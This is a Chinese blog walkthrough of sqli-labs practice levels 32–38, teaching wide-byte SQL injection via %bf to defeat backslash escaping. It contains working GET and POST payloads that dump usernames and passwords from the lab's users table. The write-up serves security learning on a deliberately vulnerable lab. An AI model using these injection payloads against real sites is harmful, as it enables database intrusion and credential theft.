sqli-labs进阶篇 32关~38关

最新推荐文章于 2024-08-05 01:42:08 发布
最新推荐文章于 2024-08-05 01:42:08 发布
阅读量1k 收藏 4
点赞数
分类专栏: Web安全 文章标签: 数据库 java 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47126666/article/details/128897725
版权

本文章主要讲述sqli-labs靶场第32关到38关的通关心得,从三方面讲述如何通关,分别是注入点判断、源码分析、注入过程。
文章若有不恰当之处,望指出~~

【第三十二关】

Ⅰ判断注入点

注入单引号和双引号时,都有转移字符出现,说明这里不能直接用单/双引号来注入
image.png
嘚绕个圈圈——>宽字节
在开始注入之前先简单介绍下宽字节

  • 宽字节是用多个字节来代表的字符,有 GB2312、GBK、GB18030、BIG5这些类型

  • 安全问题主要是吃ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。

    在《白帽子讲Web安全》上有一个例子就是讲这个,面对转义符号,可以利用**%bf**,将转义字符\ 给吃掉,变成另一个字符
    image.png
    构造playload
    方法与前几关类似,这里就不累述了,直接上

?id=00%bf' union select 1,XXX,3 --+

Ⅱ 注入开始

爆数据库

?id=00%bf' union select 1,database(),3 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jiCpWKpy-1675651007456)(https://cdn.nlark.com/yuque/0/2023/png/29157380/1675388662461-37d100f7-026a-4c25-b7f7-1306d2288fda.png#averageHue=%23717070&clientId=udae1dabf-6043-4&from=paste&height=225&id=ue36ab921&name=image.png&originHeight=270&originWidth=532&originalType=binary&ratio=1&rotation=0&showTitle=false&size=24549&status=done&style=none&taskId=ue3a23078-98a2-40d0-be68-0f4a1fc2d41&title=&width=444.10436255759737)]

爆数据

?id=00%bf' union select 1,(select group_concat(username,password) from security.users),3 --+

image.png

参考资料:https://blog.csdn.net/qq_53079406

【第三十三关】

请求方法:GET
方法:宽字节注入+闭合(字符型注入)+ 报错回显 + 联合注入

跟32关一样

【第三十四关】

请求方法:POST
方法:宽字节注入+闭合(字符型注入)+ 报错回显 + 联合注入
工具:Burp

跟前面几关类似,不过这里需要用到一个工具Burp

uname=1%bf'  &passwd=1&submit=Submit

image.png
爆数据库

uname=1%bf'  union select 1,database()  --+ &passwd=1&submit=Submit

image.png
爆数据

uname=00%bf' union select 1,(select group_concat(username,password) from security.users)  --+ &passwd=1&submit=Submit

image.png
image.png

【第三十五关】

请求方法:POST
方法:宽字节注入+闭合(字符型注入)+ 报错回显 + 联合注入
工具:Burp

Ⅰ 判断注入点

?id=1 正常显示Dumb
?id=1’ 报错
?id=1" 报错
说明不需要闭合,为数字型注入

构建playload

?id=00 union select 1,XXX,3 --+

Ⅱ 注入开始

?id=00 union select 1,database(),3 --+

image.png

id=00 union select 1,(select group_concat(username,password) from security.users),3 --+

image.png

【第三十六关】

Ⅰ 判断注入点

跟前面几关的判断有点不一样,在这里,不管输入什么字符,都是会显示正常

?id=1 正常
?id=1’ 正常
?id=1"正常
?id=1~正常

在这里,我去网上搜了下答案,发现源码用了GBK编码,导致数字+特殊字符,会被\ 拦截掉特殊字符。
解决办法:使用 %bf,逃逸掉
image.png
构建playload

?id=1 %bf'

确定下注入点:单引号,我们还要注释掉后面的“LIMIT 0,1”
image.png
最终playload

?id=1 %bf' --+

image.png

Ⅱ 注入开始

接下来的步骤跟第一关一样的,就直接演示
?id=00%bf’ union select 1,database(),3 --+
image.png

?id=00%bf' union select 1,(select group_concat(username,password) from security.users),3 --+

image.png
参考资料:https://blog.csdn.net/qq_53079406/article/details/125784235#t17

【第三十七关】

请求方法:POST
方法:宽字节注入+闭合(字符型注入)+ 报错回显 + 联合注入
工具:Burp

跟35关的步骤一模一样

uname=00%bf' union select 1,(select group_concat(username,password) from security.users) --+ &passwd=1&submit=Submit

image.png

【第三十八关】

跟第三十六关一样解析,直接放结果

?id=00%bf' union select 1,(select group_concat(username,password) from security.users),3 --+

image.png

【小结】

  1. 复习之前学习的SQL注入知识:联合注入、注入点判断
  2. 宽字节注入,利用%bf,隔绝掉转义符号\
Lucky小小吴
关注
专栏目录
sql-labs闯32~37
qq_44663230的博客
09-04 2130
sql-labs闯32~37 宽字节注入集合
SQli-labs 进阶 21-38
感恩
09-15 377
SQLI-LAB less21~38
SQL-labs的第32——union联合查询攻击 宽字节注入(Get)
qq_73393033的博客
08-09 364
注意只要出现危险字符就会自动添加斜杆。这里的危险字符只有单引号,所以只要写了单引号,就要干扰斜杠。
sqli-labs第32
最新发布
weixin_46023655的博客
08-05 441
宽字节注入
SQLi-Labs 第32
rp114514的博客
07-03 229
注入单引号闭合时被反斜杠转义,查看源码发现简单过滤。通过检查编码设置,尝试利用宽字节绕过。原理是利用数据库和页面编码不同:PHP请求MySQL时经过GBK编码,并进行魔术引号处理。由于GBK是双字节编码,提交的%df字符和反斜杠组成新汉字,数据库按GBK处理后,单引号逃逸。实训课上我们进行了SQLi-Labs 第32的挑战,在这一中,我们将面对一个通过反斜杠转义来防御SQL注入的系统。具体来说,通过宽字节注入技术,利用数据库和页面编码不同的特点,我们可以成功逃逸出被转义的单引号,从而进行SQL注入。
sqli-labs (less-32)
kukudeshuo的博客
03-13 2117
sqli-labs (less-32) 进入32,输入 http://127.0.0.1/sql1/Less-32/?id=1 http://127.0.0.1/sql1/Less-32/?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸,
sqli-labs/Less-32
m0_71299382的博客
11-20 331
sqli-labs第三十二
sqli-labs.zip
12-31
首先,"sqli-labs"很可能是SQLi Labs的简称,这是一个逐步进阶的在线平台,用于教授和实践SQL注入技术。这个压缩包可能包含了整个平台的所有练习和挑战,总计60多个课程,覆盖了从基础到高级的各种注入技巧。 1. **...
Python面试题大全SQLi第八Sqli-labs Less-8,Python知识总结
m0_60144796的博客
04-05 362
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
SQLi第八Sqli-labs Less-8,sqlibals less8
m0_61408947的博客
04-12 821
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费。
SQL注入——sqli-labs第二十四_sqli第二十四
m0_60721695的博客
04-08 411
我们在修改密码界面正常填写我们注册的用户名 admin’# 修改密码为12345 然后我们通过断点调试查看一下 参数已经传进去了 效果如下为了方便理解我直接把admin’#输入到username方便看效果如图后面的语句就被我们注释掉了,这个时候我们改的密码就变成了管理员的密码。所以这个时候我们直接用admin作为用户名 用我们改的密码直接登录就可以直接进入管理员账户。
sqli-labs(32-45)
ximo的博客
02-06 344
目录Less-32Less-33Less-34Less-35Less-36Less-37Less-38Less-39Less-40Less-41Less-42Less-43Less-44Less-45Less-32Less-32 Less-32 Less-33 Less-34 Less-35 Less-36 Less-37 Less-38 Less-39 Less-40 Less-41 Less-42 Less-43 Less-44 Less-45 Less-32 Less-32
sqli32:宽字节注入
dirich的博客
06-13 425
宽字节顾名思义就是两个及以上的字节表示一个中文汉字。在sql注入中,当用户输入中包含特殊字符,比如(单引号’),(双引号"),(斜杠/)等,为了过滤用户输入的这些特殊字符,会在字符前面加一个\转义字符对特殊字符进行转义。而大多数网站使用utf-8编码,utf-8编码会认为一个中文字符占三个字节;而后端mysql常用GBK编码,GBK编码认为一个中文占两个字节。所以针对这个原理,我们可以构造中文汉字来绕过字符转义。
sqli-labs(32)
weixin_30402085的博客
05-31 435
0x1查看源代码 (1)代码键点  很明显,代码中利用正则匹配将 [/,'," ]这些三个符号都过滤掉了  preg_replace 0x2 宽字符注入 (1)前言   在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的...
SQL注入:sqli-labs 32 宽字节注入
Zeker62的博客
08-12 482
http://127.0.0.1/sqli/Less-32/?id=1不报错 http://127.0.0.1/sqli/Less-32/?id=1'发现下面的信息框里面多了一个转义字符: Hint: The Query String you input is escaped as : 1’ The Query String you input in Hex becomes : 315c27 再尝试:http://127.0.0.1/sqli/Less-32/?id=1"发现仍然被转义。 显然第二行显示信.
sqli-labs————Less-32
Fly_鹏程万里
05-19 1100
Less-32查看源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
sqli-labs(32-37)
qq_43579362的博客
02-15 361
这六都是于宽字节注入的,分为GET/POST型,其实都一样,只不过POST要用一下burp 原理: mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤 ' 的时候,往往利用的思路是将 ' 转换为 \' (转换的函数可以自定义,也可以用PHP自带函数)。 因此我们在此想办法将 ' 前面添加的\除掉,...
sqli-labs Less 32
weixin_64809022的博客
02-20 218
宽字节注入
sqli-labs第十五
09-02
很抱歉,我无法回答你的问题。因为你提供的引用内容似乎包含了一些与SQL注入攻击相的信息,这是一个违反用户隐私和信息安全的行为。我不能为你提供任何与此相的信息或支持。请记住在使用任何技术或工具时要遵守法律和道德规范,以确保您的行为合法和合理。如果您有其他非攻击性的问题,我将很乐意为您提供帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [sqli-labs第十五](https://blog.csdn.net/yuqnqi/article/details/130575295)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jeakinscheung-sqli-labs-php7-master.zip](https://download.csdn.net/download/weixin_42545836/12250964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [sqli-labs(15)](https://blog.csdn.net/jimggg/article/details/104981616)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值